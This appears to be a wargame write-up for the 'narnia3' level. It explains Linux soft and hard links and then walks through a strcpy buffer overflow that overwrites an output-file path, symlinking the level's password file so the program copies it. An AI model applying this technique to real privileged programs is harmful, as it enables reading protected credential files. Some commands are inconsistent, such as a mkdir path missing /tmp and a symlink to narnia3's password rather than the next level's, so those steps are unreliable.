Another Buffer Overflow Exploit with a File-y twist...

17 Aug 2018

This article will show how file arguments to a program can be exploited and also explain about concept called sym-links/soft links. Arguments as a file, will be in form of a path, which is basically a string. A buffer overflow can be designed to overflow necessary strings and duplicate files may be created to exploit other files. Before we go into how it's done, we'll probably need to cover two things in Linux- Soft Links and Hard links.

  1. Soft Link - A soft link in Linux is similar to a shortcut in Windows. It creates a reference of a file in another location, with same permissions. Directories can have softlinks too. Removing original file annuls Soft Link but softlinks can be used across file systems. If "x" is an existing file, ln -s x y creates a soft-link y to x.
    Output of ls -il (Full list + inode number in front) 
          
        17830796 -rw-r--r-- 2 karthik karthik 0 Feb 25 23:42 x
        17833799 lrwxrwxrwx 1 karthik karthik 1 Feb 25 23:35 y -> x
  2. Hard link - This is a duplicate of the physical Inode in the storage medium where the file is stored. Directories cannot have hardlinks in Linux.(Mainly to maintain the tree structure) "." and ".." are actually the only directory hardlink exceptions.(Used to represent current and previous directories respectively). ln x m creates a hardlink m for x. Even if x is deleted, m can refer to the Physical inode address and data is intact.
    Output of ls -il (Full list + inode number in front) 
            
      17830796 -rw-r--r-- 2 karthik karthik 0 Feb 25 23:42 m
      17830796 -rw-r--r-- 2 karthik karthik 0 Feb 25 23:42 x
Now for some practice.. SSH into narnia3 with password obtained from here.
  • Snap of /narnia/narnia3.c
  • What is the vulnerability?

    • String copy of input file path from commandline argument without limits on characters is done. 

            
          char ofile[16] = "/dev/null";
          char ifile[32];
          strcpy(ifile, argv[1]);
    In addition, ofile is below ifile in the stack and can be overwritten/overflowed with our desired input file. We have to supply file of path big enough to overload both ifile and ofile which will be placed below ifile in the stack.

  • Exploitation Steps:
    1. Total size of ofile can be 16 bytes character. Total size of ifile should be 32 bytes.
    2. My choice for ofile was "/tmp/abcdefghi/a" and ifile was "/tmp/abcdefghi/aaaaaaaaaaaaaaaaa/tmp/abcdefghi/a" You could try other options that fit the 48-16 thing too!
    3. Create those above paths and symlink/softlink password file to ifile.
      4.         
          cd /tmp
          mkdir –p /abcdefghi/aaaaaaaaaaaaaaaaa/tmp/abcdefghi/
          touch /tmp/abcdefghi/a
          chmod 0666 /tmp/abcdefghi/a
          ln –s /etc/narnia_pass/narnia3 /tmp/abcdefghi/aaaaaaaaaaaaaaaaa/tmp/abcdefghi/a
    4. Execute ./narnia3 /tmp/abcdefghi/aaaaaaaaaaaaaaaaa/tmp/abcdefghi/a
    5. "/tmp/abcdefghi/a" will have the password of Narnia 4. cat command on that file will get you the Password for next level!

  • Behind the scenes explanation:
    • Length of "/tmp/abcdefghi/aaaaaaaaaaaaaaaaa/tmp/abcdefghi/a" is 48 characters long. Since it has no null character at the end full string is taken as input string.
    ifile holds 32 chars and below it in stack ofile is overwritten with "/tmp/abcdefghi/a" - 16 characters long.
    Ifile is a symlink of the password file and has its contents. The system call open,read and write are used to copy the contents here.
    The program opens both files and copies contents to the file in ofile, that can be displayed using a simple "cat" command.